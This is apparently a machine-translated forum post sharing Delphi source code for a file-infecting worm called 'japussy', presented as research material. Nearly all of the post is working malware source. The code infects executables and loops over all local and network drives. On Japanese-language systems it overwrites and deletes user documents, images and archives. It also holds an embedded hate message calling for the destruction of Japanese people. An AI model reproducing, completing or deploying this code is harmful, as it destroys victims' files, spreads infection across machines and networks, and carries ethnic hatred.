After sending a piece of code, the virus author who previously earned 3000 yuan earned more than January yuan in 0.1 million. After my consideration, I sent it out to get a code segment from where I am a black-based gold VIP. Please do not do anything bad, just to study how to use the code to write better code. this virus killing tool will benefit everyone.
This is definitely not a blow. I used to sell 3000 yuan. Now I am also worth the money. Here I am releasing the code for member research only. It is not for anything else. I don't want to bring any trouble to myself because of the code segment.
This code will never be unfamiliar to everyone. Maybe your computer will be paralyzed by him...
I don't need to talk about it anymore. You will know that this is the core code of pandatv compiled by Li Jun.
Program japussy;
Uses
Windows, sysutils, classes, graphics, shellapi {, registry };
Const
Headersize = 82432; // the size of the virus.
Iconoffset = $12eb8; // offset of the primary graph of the PE File
// The size obtained by compiling on my delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
Headersize = 38912; // the size of the virus body compressed by UPX
Iconoffset = $ 92bc; // the offset of the UPX compressed over the main graph of the PE File
// UPX 1.24 W usage: UPX-9 -- 8086 japussy.exe
}
Iconsize = $2e8; // the size of the master image of the PE file, which is 744 bytes.
Icontail = iconoffset + iconsize; // end of the Main chart of the PE File
Id = $44444444; // infection mark
// Spam code for writing
Catchword = 'If a race need to be killed out, it must be Yamato. '+
'If a country need to be destroyed, it must be Japan! '+
'*** W32.japussy. worm. ***';
{$ R *. Res}
Function registerserviceprocess (dwprocessid, dwtype: integer): integer;
Stdcall; External 'kernel32. dll '; // function declaration
VaR
Tmpfile: string;
Si: startupinfo;
Pi: process_information;
Isjap: Boolean = false; // Japanese OS tag
{Judge whether it is Win9x}
Function iswin9x: Boolean;
VaR
Ver: tosversioninfo;
Begin
Result: = false;
Ver. dwosversioninfosize: = sizeof (tosversioninfo );
If not getversionex (VER) then
Exit;
If (ver. dwplatformid = ver_platform_win32_windows) Then // Win9x
Result: = true;
End;
{Copying between streams}
Procedure copystream (SRC: tstream; sstartpos: integer; DST: tstream;
Dstartpos: integer; count: integer );
VaR
Scurpos, dcurpos: integer;
Begin
Scurpos: = SRC. position;
Dcurpos: = DST. position;
SRC. Seek (sstartpos, 0 );
DST. Seek (dstartpos, 0 );
DST. copyfrom (SRC, count );
SRC. Seek (scurpos, 0 );
DST. Seek (dcurpos, 0 );
End;
{Separating the host file from the infected pe file for use}
Procedure extractfile (filename: string );
VaR
Sstream, dstream: tfilestream;
Begin
Try
Sstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
Dstream: = tfilestream. Create (filename, fmcreate );
Try
Sstream. Seek (headersize, 0); // skip the virus section of the header
Dstream. copyfrom (sstream, sstream. Size-headersize );
Finally
Dstream. Free;
End;
Finally
Sstream. Free;
End;
Except
End;
End;
{Fill startupinfo structure}
Procedure fillstartupinfo (VAR Si: startupinfo; State: Word );
Begin
Si. CB: = sizeof (SI );
Si. lpreserved: = nil;
Si. lpdesktop: = nil;
Si. lptitle: = nil;
Si. dwflags: = startf_useshowwindow;
Si. wshowwindow: = State;
Si. cbreserved2: = 0;
Si. lpreserved2: = nil;
End;
{Mail with virus}
Procedure Sendmail;
Begin
// Who is willing to do this?
End;
{Infected pe file}
Procedure infectonefile (filename: string );
VaR
Hdrstream, srcstream: tfilestream;
Icostream, dststream: tmemorystream;
IID: longint;
Aicon: ticon;
Infected, ISPE: Boolean;
I: integer;
Buf: array [0 .. 1] of char;
Begin
Try // if an error occurs, the file is in use and exits.
If comparetext (filename, 'japussy.exe ') = 0 then // if you are yourself, do not infect
Exit;
Infected: = false;
ISPE: = false;
Srcstream: = tfilestream. Create (filename, fmopenread );
Try
For I: = 0 to $108 Do // check the PE File Header
Begin
Srcstream. Seek (I, sofrombeginning );
Srcstream. Read (BUF, 2 );
If (BUF [0] = #80) and (BUF [1] = #69) Then // PE tag
Begin
ISPE: = true; // It is a PE file.
Break;
End;
End;
Srcstream. Seek (-4, sofromend); // check the infection mark
Srcstream. Read (IID, 4 );
If (IID = ID) or (srcstream. Size <10240) Then // files that are too small are not infected
Infected: = true;
Finally
Srcstream. Free;
End;
If infected or (not ISPE) Then // exit if the file is infected or not a PE File
Exit;
Icostream: = tmemorystream. Create;
Dststream: = tmemorystream. Create;
Try
Aicon: = ticon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
Aicon. releasehandle;
Aicon. Handle: = extracticon (hinstance, pchar (filename), 0 );
Aicon. savetostream (icostream );
Finally
Aicon. Free;
End;
Srcstream: = tfilestream. Create (filename, fmopenread );
// Header file
Hdrstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
// Write data before the main icon of the virus.
Copystream (hdrstream, 0, dststream, 0, iconoffset );
// Write the main icon of the current program
Copystream (icostream, 22, dststream, iconoffset, iconsize );
// Write data between the main icon of the virus and the end of the virus.
Copystream (hdrstream, icontail, dststream, icontail, headersize-icontail );
// Write the Host Program
Copystream (srcstream, 0, dststream, headersize, srcstream. size );
// Write the infected mark
Dststream. Seek (0, 2 );
IID: = $44444444;
Dststream. Write (IID, 4 );
Finally
Hdrstream. Free;
End;
Finally
Srcstream. Free;
Icostream. Free;
Dststream. savetofile (filename); // Replace the host file
Dststream. Free;
End;
Except;
End;
End;
{Write the target file to the spam code and delete it}
Procedure smashfile (filename: string );
VaR
Filehandle: integer;
I, size, mass, Max, Len: integer;
Begin
Try
Setfileattributes (pchar (filename), 0); // remove the read-only attribute
Filehandle: = fileopen (filename, fmopenwrite); // open the file
Try
Size: = getfilesize (filehandle, nil); // File Size
I: = 0;
Randomize;
MAX: = random (15); // random number of times the spam code is written
If max <5 then
MAX: = 5;
Mass: = size Div Max; // size of each interval Block
Len: = length (catchword );
While I <Max do
Begin
FileSeek (filehandle, I * mass, 0); // locate
// Write the spam code to completely destroy the file
Filewrite (filehandle, catchword, Len );
INC (I );
End;
Finally
Fileclose (filehandle); // close the file
End;
Deletefile (pchar (filename); // delete it
Except
End;
End;
{Get writable drive list}
Function getdrives: string;
VaR
Disktype: word;
D: Char;
STR: string;
I: integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = CHR (I + 65 );
STR: = d + ':/';
Disktype: = getdrivetype (pchar (STR ));
// Obtain the local disk and Network Disk
If (disktype = drive_fixed) or (disktype = drive_remote) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
Procedure loopfiles (path, mask: string );
VaR
I, Count: integer;
FN, ext: string;
Subdir: tstrings;
Searchrec: tsearchrec;
MSG: tmsg;
Function isvaliddir (searchrec: tsearchrec): integer;
Begin
If (searchrec. ATTR <> 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 0 // not a directory
Else if (searchrec. ATTR = 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 1 // not the root directory
Else result: = 2; // the root directory.
End;
Begin
If (findfirst (path + mask, faanyfile, searchrec) = 0) then
Begin
Repeat
Peekmessage (MSG, 0, 0, 0, pm_remove); // adjust the message queue to avoid suspicion.
If isvaliddir (searchrec) = 0 then
Begin
FN: = path + searchrec. Name;
Ext: = uppercase (extractfileext (FN ));
If (EXT = '.exe ') or (EXT ='. scr ') then
Begin
Infectonefile (FN); // infect the executable file
End
Else if (EXT = '.htm') or (EXT = '.html ') or (EXT ='. asp ') then
Begin
// Infect HTML and ASP files and write base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if ext = '. ADC' Then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If isjap then // the operating system of the plain text
Begin
If (EXT = '.doc ') or (EXT = '.xls') or (EXT = '. mdb') or
(EXT = 'hangzhou') or (EXT = '. M') or (EXT ='. A') or
(EXT = '.wma ') or (EXT = '.zip') or (EXT = '.rar ') or
(EXT = '. MpEG') or (EXT = '. asf') or (EXT = '.jpg') or
(EXT = '.jpeg ') or (EXT = '.gif') or (EXT = '.swf ') or
(EXT = 'users') or (EXT = '. chm') or (EXT ='. avi') then
Smashfile (FN); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Subdir: = tstringlist. Create;
If (findfirst (path + '*. *', fadirectory, searchrec) = 0) then
Begin
Repeat
If isvaliddir (searchrec) = 1 then
Subdir. Add (searchrec. Name );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Count: = subdir. Count-1;
For I: = 0 to count do
Loopfiles (path + subdir. Strings + '/', mask );
Freeandnil (subdir );
End;
{Traverse all files on the disk}
Procedure infectfiles;
VaR
Driverlist: string;
I, Len: integer;
Begin
If getacp = 932 then // Japanese Operating System
Isjap: = true; // Let's die!
Driverlist: = getdrives; // obtain the writable disk list.
Len: = length (driverlist );
While true do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
Loopfiles (driverlist + ':/', '*. *'); // infected
Sendmail; // send a mail with a virus
Sleep (1000*60*5); // sleep for 5 minutes
End;
End;
{Main program start}
Begin
If iswin9x then // is Win9x
Registerserviceprocess (getcurrentprocessid, 1) // register as a service process
Else // winnt
Begin
// Remote thread ing to explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If comparetext (extractfilename (paramstr (0), 'japussy.exe ') = 0 then
Infectfiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
Tmpfile: = paramstr (0); // create a temporary file
Delete (tmpfile, length (tmpfile)-4, 4 );
Tmpfile: = tmpfile + #32 + '.exe '; // real host file with one more space
Extractfile (tmpfile); // separated
Fillstartupinfo (Si, sw_showdefault );
CreateProcess (pchar (tmpfile), pchar (tmpfile), nil, nil, true,
0, nil, '.', Si, Pi); // create a new process to run
Infectfiles; // infect and send emails
End;
End.